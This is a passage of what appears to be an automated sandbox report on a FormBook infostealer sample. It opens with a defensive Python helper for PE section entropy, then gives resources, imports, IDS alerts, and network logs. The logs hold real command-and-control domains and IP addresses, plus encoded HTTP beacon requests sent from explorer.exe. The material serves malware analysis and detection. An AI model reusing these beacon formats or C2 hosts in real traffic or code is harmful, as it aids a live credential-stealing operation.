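        rows.append({"name": name, "vaddr": vaddr, "vsize": vsize, "raw_size": raw_size,
                     "entropy": round(ent, 3),
                     "likely_packed": ent >= PACKED_ENTROPY_THRESHOLD})
    return rows


def build_sample_pe() -> bytes:
    """Constructed toy PE32 (not the analysed sample): a low-entropy .text and a
    .rsrc filled from a seeded PRNG, so the verdict logic can run offline."""
    rng = random.Random(1)
    text_body = b"\x90" * 0x800 + b"\xcc" * 0x200                    # NOP/INT3 filler
    rsrc_body = bytes(rng.getrandbits(8) for _ in range(0x4000))     # pseudo-random bytes
    opt = bytes(0xE0)                   # zeroed PE32 optional header; only its size matters here
    e_lfanew = 0x40
    headers_len = e_lfanew + 4 + 20 + len(opt) + 2 * 40
    raw_text = -(-headers_len // 0x200) * 0x200                      # align to 0x200
    raw_rsrc = raw_text + len(text_body)
    out = bytearray(b"MZ" + bytes(0x3A) + struct.pack("<I", e_lfanew))
    out += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt), 0x102)
    out += opt
    out += struct.pack("<8sIIIIIIHHI", b".text", len(text_body), 0x1000, len(text_body),
                       raw_text, 0, 0, 0, 0, 0x60000020)
    out += struct.pack("<8sIIIIIIHHI", b".rsrc", len(rsrc_body), 0x3000, len(rsrc_body),
                       raw_rsrc, 0, 0, 0, 0, 0x40000040)
    out += bytes(raw_text - len(out)) + text_body + rsrc_body
    return bytes(out)


if __name__ == "__main__":
    for row in section_report(build_sample_pe()):
        print(row)
```

Run against a real file, `section_report(open(path, "rb").read())` gives the same name, virtual address, raw size and entropy columns the report tabulates; a section that reads as near 8.0 while the entrypoint section stays low is the usual shape of a loader carrying an encrypted payload, and the whole-file entropy the report gives for the dropped data blob can be checked with `shannon_entropy` alone.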

                                                Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2d2e0 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x3db08 | 0x94a8 | data | English | United States
RT_ICON | 0x46fb0 | 0x5488 | data | English | United States
RT_ICON | 0x4c438 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 248, next used block 520093696 | English | United States
RT_ICON | 0x50660 | 0x25a8 | data | English | United States
RT_ICON | 0x52c08 | 0x10a8 | data | English | United States
RT_ICON | 0x53cb0 | 0x988 | data | English | United States
RT_ICON | 0x54638 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_DIALOG | 0x54aa0 | 0x100 | data | English | United States
RT_DIALOG | 0x54ba0 | 0x11c | data | English | United States
RT_DIALOG | 0x54cc0 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x54d20 | 0x76 | data | English | United States
RT_MANIFEST | 0x54d98 | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                                Imports

DLL | Import
KERNEL32.dll: GetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
USER32.dll: SetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
GDI32.dll: SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll: SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
ADVAPI32.dll: RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll: ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll: OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
10/13/21-16:32:21.743198 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49796 | 34.102.136.180 | 192.168.2.6
10/13/21-16:32:42.685873 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49809 | 34.102.136.180 | 192.168.2.6
10/13/21-16:32:48.382262 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49810 | 80 | 192.168.2.6 | 172.105.103.207
10/13/21-16:32:48.382262 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49810 | 80 | 192.168.2.6 | 172.105.103.207
10/13/21-16:32:48.382262 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49810 | 80 | 192.168.2.6 | 172.105.103.207
10/13/21-16:33:00.400927 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49840 | 34.102.136.180 | 192.168.2.6
10/13/21-16:33:20.400217 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49843 | 80 | 192.168.2.6 | 134.122.133.171
10/13/21-16:33:20.400217 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49843 | 80 | 192.168.2.6 | 134.122.133.171
10/13/21-16:33:20.400217 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49843 | 80 | 192.168.2.6 | 134.122.133.171

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 13, 2021 16:32:21.611291885 CEST | 49796 | 80 | 192.168.2.6 | 34.102.136.180
Oct 13, 2021 16:32:21.629221916 CEST | 80 | 49796 | 34.102.136.180 | 192.168.2.6
Oct 13, 2021 16:32:21.629390001 CEST | 49796 | 80 | 192.168.2.6 | 34.102.136.180
Oct 13, 2021 16:32:21.629479885 CEST | 49796 | 80 | 192.168.2.6 | 34.102.136.180
Oct 13, 2021 16:32:21.647284031 CEST | 80 | 49796 | 34.102.136.180 | 192.168.2.6
Oct 13, 2021 16:32:21.743197918 CEST | 80 | 49796 | 34.102.136.180 | 192.168.2.6
Oct 13, 2021 16:32:21.743272066 CEST | 80 | 49796 | 34.102.136.180 | 192.168.2.6
Oct 13, 2021 16:32:21.743387938 CEST | 49796 | 80 | 192.168.2.6 | 34.102.136.180
Oct 13, 2021 16:32:21.743482113 CEST | 49796 | 80 | 192.168.2.6 | 34.102.136.180
Oct 13, 2021 16:32:21.761204958 CEST | 80 | 49796 | 34.102.136.180 | 192.168.2.6
Oct 13, 2021 16:32:26.778966904 CEST | 49797 | 80 | 192.168.2.6 | 94.73.147.156
Oct 13, 2021 16:32:26.827833891 CEST | 80 | 49797 | 94.73.147.156 | 192.168.2.6
Oct 13, 2021 16:32:26.828027964 CEST | 49797 | 80 | 192.168.2.6 | 94.73.147.156
Oct 13, 2021 16:32:26.828304052 CEST | 49797 | 80 | 192.168.2.6 | 94.73.147.156
Oct 13, 2021 16:32:26.876580954 CEST | 80 | 49797 | 94.73.147.156 | 192.168.2.6
Oct 13, 2021 16:32:26.878040075 CEST | 80 | 49797 | 94.73.147.156 | 192.168.2.6
Oct 13, 2021 16:32:26.878061056 CEST | 80 | 49797 | 94.73.147.156 | 192.168.2.6
Oct 13, 2021 16:32:26.878074884 CEST | 80 | 49797 | 94.73.147.156 | 192.168.2.6
Oct 13, 2021 16:32:26.878226995 CEST | 49797 | 80 | 192.168.2.6 | 94.73.147.156
Oct 13, 2021 16:32:26.878277063 CEST | 49797 | 80 | 192.168.2.6 | 94.73.147.156
Oct 13, 2021 16:32:26.878371000 CEST | 49797 | 80 | 192.168.2.6 | 94.73.147.156
Oct 13, 2021 16:32:26.926930904 CEST | 80 | 49797 | 94.73.147.156 | 192.168.2.6
Oct 13, 2021 16:32:31.995559931 CEST | 49803 | 80 | 192.168.2.6 | 3.223.115.185
Oct 13, 2021 16:32:32.133052111 CEST | 80 | 49803 | 3.223.115.185 | 192.168.2.6
Oct 13, 2021 16:32:32.133186102 CEST | 49803 | 80 | 192.168.2.6 | 3.223.115.185
Oct 13, 2021 16:32:32.133338928 CEST | 49803 | 80 | 192.168.2.6 | 3.223.115.185
Oct 13, 2021 16:32:32.270781994 CEST | 80 | 49803 | 3.223.115.185 | 192.168.2.6
Oct 13, 2021 16:32:32.270977974 CEST | 49803 | 80 | 192.168.2.6 | 3.223.115.185
Oct 13, 2021 16:32:32.271035910 CEST | 49803 | 80 | 192.168.2.6 | 3.223.115.185
Oct 13, 2021 16:32:32.408277988 CEST | 80 | 49803 | 3.223.115.185 | 192.168.2.6
Oct 13, 2021 16:32:37.423695087 CEST | 49804 | 80 | 192.168.2.6 | 82.98.134.154
Oct 13, 2021 16:32:37.462107897 CEST | 80 | 49804 | 82.98.134.154 | 192.168.2.6
Oct 13, 2021 16:32:37.462608099 CEST | 49804 | 80 | 192.168.2.6 | 82.98.134.154
Oct 13, 2021 16:32:37.462970972 CEST | 49804 | 80 | 192.168.2.6 | 82.98.134.154
Oct 13, 2021 16:32:37.501425982 CEST | 80 | 49804 | 82.98.134.154 | 192.168.2.6
Oct 13, 2021 16:32:37.501957893 CEST | 80 | 49804 | 82.98.134.154 | 192.168.2.6
Oct 13, 2021 16:32:37.501981020 CEST | 80 | 49804 | 82.98.134.154 | 192.168.2.6
Oct 13, 2021 16:32:37.502202034 CEST | 49804 | 80 | 192.168.2.6 | 82.98.134.154
Oct 13, 2021 16:32:37.502230883 CEST | 49804 | 80 | 192.168.2.6 | 82.98.134.154
Oct 13, 2021 16:32:37.540597916 CEST | 80 | 49804 | 82.98.134.154 | 192.168.2.6
Oct 13, 2021 16:32:42.552027941 CEST | 49809 | 80 | 192.168.2.6 | 34.102.136.180
Oct 13, 2021 16:32:42.570043087 CEST | 80 | 49809 | 34.102.136.180 | 192.168.2.6
Oct 13, 2021 16:32:42.570606947 CEST | 49809 | 80 | 192.168.2.6 | 34.102.136.180
Oct 13, 2021 16:32:42.570636034 CEST | 49809 | 80 | 192.168.2.6 | 34.102.136.180
Oct 13, 2021 16:32:42.589291096 CEST | 80 | 49809 | 34.102.136.180 | 192.168.2.6
Oct 13, 2021 16:32:42.685873032 CEST | 80 | 49809 | 34.102.136.180 | 192.168.2.6
Oct 13, 2021 16:32:42.685899019 CEST | 80 | 49809 | 34.102.136.180 | 192.168.2.6
Oct 13, 2021 16:32:42.686481953 CEST | 49809 | 80 | 192.168.2.6 | 34.102.136.180
Oct 13, 2021 16:32:42.686516047 CEST | 49809 | 80 | 192.168.2.6 | 34.102.136.180
Oct 13, 2021 16:32:43.038979053 CEST | 49809 | 80 | 192.168.2.6 | 34.102.136.180
Oct 13, 2021 16:32:43.057055950 CEST | 80 | 49809 | 34.102.136.180 | 192.168.2.6
Oct 13, 2021 16:32:47.810384989 CEST | 49810 | 80 | 192.168.2.6 | 172.105.103.207
Oct 13, 2021 16:32:48.380736113 CEST | 80 | 49810 | 172.105.103.207 | 192.168.2.6
Oct 13, 2021 16:32:48.381952047 CEST | 49810 | 80 | 192.168.2.6 | 172.105.103.207
Oct 13, 2021 16:32:48.382261992 CEST | 49810 | 80 | 192.168.2.6 | 172.105.103.207
Oct 13, 2021 16:32:48.885271072 CEST | 49810 | 80 | 192.168.2.6 | 172.105.103.207
Oct 13, 2021 16:32:49.387250900 CEST | 80 | 49810 | 172.105.103.207 | 192.168.2.6
Oct 13, 2021 16:32:49.389600039 CEST | 80 | 49810 | 172.105.103.207 | 192.168.2.6
Oct 13, 2021 16:32:49.389750957 CEST | 49810 | 80 | 192.168.2.6 | 172.105.103.207
Oct 13, 2021 16:32:53.954910994 CEST | 49822 | 80 | 192.168.2.6 | 52.206.159.80
Oct 13, 2021 16:32:54.092483044 CEST | 80 | 49822 | 52.206.159.80 | 192.168.2.6
Oct 13, 2021 16:32:54.093113899 CEST | 49822 | 80 | 192.168.2.6 | 52.206.159.80
Oct 13, 2021 16:32:54.093128920 CEST | 49822 | 80 | 192.168.2.6 | 52.206.159.80
Oct 13, 2021 16:32:54.231038094 CEST | 80 | 49822 | 52.206.159.80 | 192.168.2.6
Oct 13, 2021 16:32:54.231328011 CEST | 49822 | 80 | 192.168.2.6 | 52.206.159.80
Oct 13, 2021 16:32:54.231355906 CEST | 49822 | 80 | 192.168.2.6 | 52.206.159.80
Oct 13, 2021 16:32:54.368494034 CEST | 80 | 49822 | 52.206.159.80 | 192.168.2.6
Oct 13, 2021 16:33:00.267452955 CEST | 49840 | 80 | 192.168.2.6 | 34.102.136.180
Oct 13, 2021 16:33:00.285463095 CEST | 80 | 49840 | 34.102.136.180 | 192.168.2.6
Oct 13, 2021 16:33:00.285733938 CEST | 49840 | 80 | 192.168.2.6 | 34.102.136.180
Oct 13, 2021 16:33:00.285758972 CEST | 49840 | 80 | 192.168.2.6 | 34.102.136.180
Oct 13, 2021 16:33:00.303599119 CEST | 80 | 49840 | 34.102.136.180 | 192.168.2.6
Oct 13, 2021 16:33:00.400927067 CEST | 80 | 49840 | 34.102.136.180 | 192.168.2.6
Oct 13, 2021 16:33:00.400990963 CEST | 80 | 49840 | 34.102.136.180 | 192.168.2.6
Oct 13, 2021 16:33:00.401284933 CEST | 49840 | 80 | 192.168.2.6 | 34.102.136.180
Oct 13, 2021 16:33:00.480761051 CEST | 49840 | 80 | 192.168.2.6 | 34.102.136.180
Oct 13, 2021 16:33:00.498707056 CEST | 80 | 49840 | 34.102.136.180 | 192.168.2.6
Oct 13, 2021 16:33:05.526390076 CEST | 49841 | 80 | 192.168.2.6 | 45.91.80.182
Oct 13, 2021 16:33:05.708817005 CEST | 80 | 49841 | 45.91.80.182 | 192.168.2.6
Oct 13, 2021 16:33:05.709094048 CEST | 49841 | 80 | 192.168.2.6 | 45.91.80.182
Oct 13, 2021 16:33:05.709494114 CEST | 49841 | 80 | 192.168.2.6 | 45.91.80.182
Oct 13, 2021 16:33:05.892004967 CEST | 80 | 49841 | 45.91.80.182 | 192.168.2.6
Oct 13, 2021 16:33:06.203414917 CEST | 49841 | 80 | 192.168.2.6 | 45.91.80.182
Oct 13, 2021 16:33:06.303915977 CEST | 80 | 49841 | 45.91.80.182 | 192.168.2.6
Oct 13, 2021 16:33:06.303946972 CEST | 80 | 49841 | 45.91.80.182 | 192.168.2.6
Oct 13, 2021 16:33:06.304178953 CEST | 49841 | 80 | 192.168.2.6 | 45.91.80.182
Oct 13, 2021 16:33:06.304214954 CEST | 49841 | 80 | 192.168.2.6 | 45.91.80.182
Oct 13, 2021 16:33:06.386147976 CEST | 80 | 49841 | 45.91.80.182 | 192.168.2.6
Oct 13, 2021 16:33:06.386403084 CEST | 49841 | 80 | 192.168.2.6 | 45.91.80.182
Oct 13, 2021 16:33:11.301028013 CEST | 49842 | 80 | 192.168.2.6 | 62.210.5.81
Oct 13, 2021 16:33:11.330210924 CEST | 80 | 49842 | 62.210.5.81 | 192.168.2.6
Oct 13, 2021 16:33:11.330400944 CEST | 49842 | 80 | 192.168.2.6 | 62.210.5.81
Oct 13, 2021 16:33:11.330621958 CEST | 49842 | 80 | 192.168.2.6 | 62.210.5.81
Oct 13, 2021 16:33:11.359313965 CEST | 80 | 49842 | 62.210.5.81 | 192.168.2.6
Oct 13, 2021 16:33:11.828660011 CEST | 49842 | 80 | 192.168.2.6 | 62.210.5.81
Oct 13, 2021 16:33:11.857929945 CEST | 80 | 49842 | 62.210.5.81 | 192.168.2.6
Oct 13, 2021 16:33:11.858082056 CEST | 49842 | 80 | 192.168.2.6 | 62.210.5.81

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 13, 2021 16:32:21.559715986 CEST | 63745 | 53 | 192.168.2.6 | 8.8.8.8
Oct 13, 2021 16:32:21.604350090 CEST | 53 | 63745 | 8.8.8.8 | 192.168.2.6
Oct 13, 2021 16:32:26.761162996 CEST | 50055 | 53 | 192.168.2.6 | 8.8.8.8
Oct 13, 2021 16:32:26.777719975 CEST | 53 | 50055 | 8.8.8.8 | 192.168.2.6
Oct 13, 2021 16:32:31.888350964 CEST | 50339 | 53 | 192.168.2.6 | 8.8.8.8
Oct 13, 2021 16:32:31.994424105 CEST | 53 | 50339 | 8.8.8.8 | 192.168.2.6
Oct 13, 2021 16:32:37.304816961 CEST | 63307 | 53 | 192.168.2.6 | 8.8.8.8
Oct 13, 2021 16:32:37.421803951 CEST | 53 | 63307 | 8.8.8.8 | 192.168.2.6
Oct 13, 2021 16:32:42.526494026 CEST | 49694 | 53 | 192.168.2.6 | 8.8.8.8
Oct 13, 2021 16:32:42.550077915 CEST | 53 | 49694 | 8.8.8.8 | 192.168.2.6
Oct 13, 2021 16:32:47.702405930 CEST | 54982 | 53 | 192.168.2.6 | 8.8.8.8
Oct 13, 2021 16:32:47.809142113 CEST | 53 | 54982 | 8.8.8.8 | 192.168.2.6
Oct 13, 2021 16:32:53.922291040 CEST | 62116 | 53 | 192.168.2.6 | 8.8.8.8
Oct 13, 2021 16:32:53.953161001 CEST | 53 | 62116 | 8.8.8.8 | 192.168.2.6
Oct 13, 2021 16:33:00.220139980 CEST | 63816 | 53 | 192.168.2.6 | 8.8.8.8
Oct 13, 2021 16:33:00.266294003 CEST | 53 | 63816 | 8.8.8.8 | 192.168.2.6
Oct 13, 2021 16:33:05.489540100 CEST | 55014 | 53 | 192.168.2.6 | 8.8.8.8
Oct 13, 2021 16:33:05.524667978 CEST | 53 | 55014 | 8.8.8.8 | 192.168.2.6
Oct 13, 2021 16:33:11.264848948 CEST | 62208 | 53 | 192.168.2.6 | 8.8.8.8
Oct 13, 2021 16:33:11.299397945 CEST | 53 | 62208 | 8.8.8.8 | 192.168.2.6
Oct 13, 2021 16:33:16.845551968 CEST | 57574 | 53 | 192.168.2.6 | 8.8.8.8
Oct 13, 2021 16:33:17.104530096 CEST | 53 | 57574 | 8.8.8.8 | 192.168.2.6

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 13, 2021 16:32:21.559715986 CEST | 192.168.2.6 | 8.8.8.8 | 0x6151 | Standard query (0) | www.playstarexch.com | A (IP address) | IN (0x0001)
Oct 13, 2021 16:32:26.761162996 CEST | 192.168.2.6 | 8.8.8.8 | 0xa361 | Standard query (0) | www.anadolu.academy | A (IP address) | IN (0x0001)
Oct 13, 2021 16:32:31.888350964 CEST | 192.168.2.6 | 8.8.8.8 | 0xeece | Standard query (0) | www.altitudebc.com | A (IP address) | IN (0x0001)
Oct 13, 2021 16:32:37.304816961 CEST | 192.168.2.6 | 8.8.8.8 | 0xa6ff | Standard query (0) | www.unasolucioendesa.com | A (IP address) | IN (0x0001)
Oct 13, 2021 16:32:42.526494026 CEST | 192.168.2.6 | 8.8.8.8 | 0xcad5 | Standard query (0) | www.elliotpioneer.com | A (IP address) | IN (0x0001)
Oct 13, 2021 16:32:47.702405930 CEST | 192.168.2.6 | 8.8.8.8 | 0x8971 | Standard query (0) | www.thesewhitevvalls.com | A (IP address) | IN (0x0001)
Oct 13, 2021 16:32:53.922291040 CEST | 192.168.2.6 | 8.8.8.8 | 0x55a | Standard query (0) | www.lumberjackguitarloops.com | A (IP address) | IN (0x0001)
Oct 13, 2021 16:33:00.220139980 CEST | 192.168.2.6 | 8.8.8.8 | 0xfacb | Standard query (0) | www.carts-amazon.com | A (IP address) | IN (0x0001)
Oct 13, 2021 16:33:05.489540100 CEST | 192.168.2.6 | 8.8.8.8 | 0x746f | Standard query (0) | www.chinaopedia.com | A (IP address) | IN (0x0001)
Oct 13, 2021 16:33:11.264848948 CEST | 192.168.2.6 | 8.8.8.8 | 0x113b | Standard query (0) | www.atp-cayenne.com | A (IP address) | IN (0x0001)
Oct 13, 2021 16:33:16.845551968 CEST | 192.168.2.6 | 8.8.8.8 | 0xc659 | Standard query (0) | www.6233v.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 13, 2021 16:32:21.604350090 CEST | 8.8.8.8 | 192.168.2.6 | 0x6151 | No error (0) | www.playstarexch.com | playstarexch.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 13, 2021 16:32:21.604350090 CEST | 8.8.8.8 | 192.168.2.6 | 0x6151 | No error (0) | playstarexch.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Oct 13, 2021 16:32:26.777719975 CEST | 8.8.8.8 | 192.168.2.6 | 0xa361 | No error (0) | www.anadolu.academy | anadolu.academy | - | CNAME (Canonical name) | IN (0x0001)
Oct 13, 2021 16:32:26.777719975 CEST | 8.8.8.8 | 192.168.2.6 | 0xa361 | No error (0) | anadolu.academy | - | 94.73.147.156 | A (IP address) | IN (0x0001)
Oct 13, 2021 16:32:31.994424105 CEST | 8.8.8.8 | 192.168.2.6 | 0xeece | No error (0) | www.altitudebc.com | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 13, 2021 16:32:31.994424105 CEST | 8.8.8.8 | 192.168.2.6 | 0xeece | No error (0) | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | - | 3.223.115.185 | A (IP address) | IN (0x0001)
Oct 13, 2021 16:32:37.421803951 CEST | 8.8.8.8 | 192.168.2.6 | 0xa6ff | No error (0) | www.unasolucioendesa.com | - | 82.98.134.154 | A (IP address) | IN (0x0001)
Oct 13, 2021 16:32:42.550077915 CEST | 8.8.8.8 | 192.168.2.6 | 0xcad5 | No error (0) | www.elliotpioneer.com | elliotpioneer.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 13, 2021 16:32:42.550077915 CEST | 8.8.8.8 | 192.168.2.6 | 0xcad5 | No error (0) | elliotpioneer.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Oct 13, 2021 16:32:47.809142113 CEST | 8.8.8.8 | 192.168.2.6 | 0x8971 | No error (0) | www.thesewhitevvalls.com | - | 172.105.103.207 | A (IP address) | IN (0x0001)
Oct 13, 2021 16:32:53.953161001 CEST | 8.8.8.8 | 192.168.2.6 | 0x55a | No error (0) | www.lumberjackguitarloops.com | propage.beatstars.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 13, 2021 16:32:53.953161001 CEST | 8.8.8.8 | 192.168.2.6 | 0x55a | No error (0) | propage.beatstars.com | - | 52.206.159.80 | A (IP address) | IN (0x0001)
Oct 13, 2021 16:33:00.266294003 CEST | 8.8.8.8 | 192.168.2.6 | 0xfacb | No error (0) | www.carts-amazon.com | carts-amazon.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 13, 2021 16:33:00.266294003 CEST | 8.8.8.8 | 192.168.2.6 | 0xfacb | No error (0) | carts-amazon.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Oct 13, 2021 16:33:05.524667978 CEST | 8.8.8.8 | 192.168.2.6 | 0x746f | No error (0) | www.chinaopedia.com | chinaopedia.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 13, 2021 16:33:05.524667978 CEST | 8.8.8.8 | 192.168.2.6 | 0x746f | No error (0) | chinaopedia.com | - | 45.91.80.182 | A (IP address) | IN (0x0001)
Oct 13, 2021 16:33:11.299397945 CEST | 8.8.8.8 | 192.168.2.6 | 0x113b | No error (0) | www.atp-cayenne.com | - | 62.210.5.81 | A (IP address) | IN (0x0001)
Oct 13, 2021 16:33:17.104530096 CEST | 8.8.8.8 | 192.168.2.6 | 0xc659 | No error (0) | www.6233v.com | twyg-9639v.com.txwlcdn13.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 13, 2021 16:33:17.104530096 CEST | 8.8.8.8 | 192.168.2.6 | 0xc659 | No error (0) | twyg-9639v.com.txwlcdn13.com | pflvcllbpf.bigbackbone.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 13, 2021 16:33:17.104530096 CEST | 8.8.8.8 | 192.168.2.6 | 0xc659 | No error (0) | pflvcllbpf.bigbackbone.com | pflvcllbpf.hellomyai.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 13, 2021 16:33:17.104530096 CEST | 8.8.8.8 | 192.168.2.6 | 0xc659 | No error (0) | pflvcllbpf.hellomyai.com | - | 134.122.133.171 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.playstarexch.com
• www.anadolu.academy
• www.altitudebc.com
• www.unasolucioendesa.com
• www.elliotpioneer.com
• www.thesewhitevvalls.com
• www.lumberjackguitarloops.com
• www.carts-amazon.com
• www.chinaopedia.com
• www.atp-cayenne.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49796 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction
Oct 13, 2021 16:32:21.629479885 CEST | 2211 | OUT
GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw== HTTP/1.1
Host: www.playstarexch.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp | kBytes transferred | Direction
Oct 13, 2021 16:32:21.743197918 CEST | 2309 | IN
HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 13 Oct 2021 14:32:21 GMT
Content-Type: text/html
Content-Length: 275
ETag: "615f93b1-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49797 | 94.73.147.156 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction
Oct 13, 2021 16:32:26.828304052 CEST | 4898 | OUT
GET /b2c0/?EN9pK2=oisE9+VmZgmAkkrchIKqNWGyfJvkxHxTzu9sANYqnymeIWLgjiN74zWNndmykH/eOqLqSG+txg==&nZR4=4hr8Pfz HTTP/1.1
Host: www.anadolu.academy
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp | kBytes transferred | Direction
Oct 13, 2021 16:32:26.878040075 CEST | 4900 | IN
HTTP/1.1 404 Not Found
Connection: close
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 1237
Date: Wed, 13 Oct 2021 14:32:26 GMT
Server: LiteSpeed
Vary: User-Agent
